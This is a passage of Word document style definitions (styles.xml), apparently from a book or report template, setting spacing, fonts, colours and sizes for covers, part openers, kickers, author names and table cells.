    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="lead">
    <w:name w:val="lead"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="part-blurb">
    <w:name w:val="part-blurb"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="page">
    <w:name w:val="page"/>
    <w:basedOn w:val="Normal"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="part-opener">
    <w:name w:val="part-opener"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="F4EFE3"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="chapter-opener">
    <w:name w:val="chapter-opener"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="336"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="chapter-goal">
    <w:name w:val="chapter-goal"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="callout">
    <w:name w:val="callout"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
      <w:spacing w:before="216" w:after="216"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="cover">
    <w:name w:val="cover"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="F8F6F0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="cover-art">
    <w:name w:val="cover-art"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="48"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="rule">
    <w:name w:val="rule"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="384" w:after="384"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="right">
    <w:name w:val="right"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
      <w:jc w:val="right"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="center">
    <w:name w:val="center"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="small">
    <w:name w:val="small"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="index-cols">
    <w:name w:val="index-cols"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="19"/>
      <w:szCs w:val="19"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="part-mark">
    <w:name w:val="part-mark"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="36"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="kicker">
    <w:name w:val="kicker"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="tag">
    <w:name w:val="tag"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="author">
    <w:name w:val="author"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="w">
    <w:name w:val="w"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="name">
    <w:name w:val="name"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="org">
    <w:name w:val="org"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="kicker1">
    <w:name w:val="kicker1"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:color w:val="C64545"/>
      <w:spacing w:val="120"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="part-blurb1">
    <w:name w:val="part-blurb1"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="288" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="D7DDE3"/>
      <w:sz w:val="25"/>
      <w:szCs w:val="25"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="kicker2">
    <w:name w:val="kicker2"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:spacing w:val="60"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="w1">
    <w:name w:val="w1"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="tag1">
    <w:name w:val="tag1"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:color w:val="C64545"/>
      <w:spacing w:val="100"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="author1">
    <w:name w:val="author1"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:color w:val="D8D6CF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="name1">
    <w:name w:val="name1"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:color w:val="FFFFFF"/>
      <w:spacing w:val="20"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="org1">
    <w:name w:val="org1"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="96" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="A6A499"/>
      <w:spacing w:val="60"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="p">
    <w:name w:val="p"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="c">
    <w:name w:val="c"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="d">
    <w:name w:val="d"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro" w:hint="default"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="chapter">
    <w:name w:val="chapter"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="num">
    <w:name w:val="num"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="part">
    <w:name w:val="part"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="appendix">
    <w:name w:val="appendix"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="hdr">
    <w:name w:val="hdr"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:b/>
      <w:bCs/>
      <w:spacing w:val="15"/>
      <w:sz w:val="17"/>
      <w:szCs w:val="17"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="cell">
    <w:name w:val="cell"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:sz w:val="15"/>
      <w:szCs w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="kicker3">
    <w:name w:val="kicker3"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:color w:val="C64545"/>
      <w:spacing w:val="120"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="part-blurb2">
    <w:name w:val="part-blurb2"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="288" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="D7DDE3"/>
      <w:sz w:val="25"/>
      <w:szCs w:val="25"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="kicker4">
    <w:name w:val="kicker4"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:spacing w:val="60"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="w2">
    <w:name w:val="w2"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="tag2">
    <w:name w:val="tag2"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:color w:val="C64545"/>
      <w:spacing w:val="100"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="author2">
    <w:name w:val="author2"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:color w:val="D8D6CF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="name2">
    <w:name w:val="name2"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:color w:val="FFFFFF"/>
      <w:spacing w:val="20"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="org2">
    <w:name w:val="org2"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="96" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="A6A499"/>
      <w:spacing w:val="60"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="lbl">
    <w:name w:val="lbl"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="lblw">
    <w:name w:val="lblw"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="17"/>
      <w:szCs w:val="17"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="kicker5">
    <w:name w:val="kicker5"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:color w:val="C64545"/>
      <w:spacing w:val="120"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="part-blurb3">
    <w:name w:val="part-blurb3"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="288" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="D7DDE3"/>
      <w:sz w:val="25"/>
      <w:szCs w:val="25"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="kicker6">
    <w:name w:val="kicker6"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:spacing w:val="60"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="w3">
    <w:name w:val="w3"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="tag3">
    <w:name w:val="tag3"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:color w:val="C64545"/>
      <w:spacing w:val="100"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="author3">
    <w:name w:val="author3"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:color w:val="D8D6CF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="name3">
    <w:name w:val="name3"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:color w:val="FFFFFF"/>
      <w:spacing w:val="20"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="org3">
    <w:name w:val="org3"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="96" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="A6A499"/>
      <w:spacing w:val="60"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="n">
    <w:name w:val="n"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="nw">
    <w:name w:val="nw"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="17"/>
      <w:szCs w:val="17"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="s">
    <w:name w:val="s"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="kicker7">
    <w:name w:val="kicker7"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:color w:val="C64545"/>
      <w:spacing w:val="120"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="part-blurb4">
    <w:name w:val="part-blurb4"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="288" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="D7DDE3"/>
      <w:sz w:val="25"/>
      <w:szCs w:val="25"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="kicker8">
    <w:name w:val="kicker8"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:spacing w:val="60"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="w4">
    <w:name w:val="w4"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="tag4">
    <w:name w:val="tag4"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:color w:val="C64545"/>
      <w:spacing w:val="100"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="author4">
    <w:name w:val="author4"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:color w:val="D8D6CF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="name4">
    <w:name w:val="name4"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:color w:val="FFFFFF"/>
      <w:spacing w:val="20"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="org4">
    <w:name w:val="org4"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="96" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="A6A499"/>
      <w:spacing w:val="60"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="d1">
    <w:name w:val="d1"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="dw">
    <w:name w:val="dw"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="q">
    <w:name w:val="q"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="15"/>
      <w:szCs w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="d2">
    <w:name w:val="d2"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="36" w:after="36"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="kicker9">
    <w:name w:val="kicker9"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:color w:val="C64545"/>
      <w:spacing w:val="120"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="part-blurb5">
    <w:name w:val="part-blurb5"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="288" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="D7DDE3"/>
      <w:sz w:val="25"/>
      <w:szCs w:val="25"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="kicker10">
    <w:name w:val="kicker10"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:spacing w:val="60"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="w5">
    <w:name w:val="w5"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="tag5">
    <w:name w:val="tag5"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:caps/>
      <w:color w:val="C64545"/>
      <w:spacing w:val="100"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="author5">
    <w:name w:val="author5"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
      <w:color w:val="D8D6CF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="name5">
    <w:name w:val="name5"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="132" w:after="132"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:color w:val="FFFFFF"/>
      <w:spacing w:val="20"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="org5">
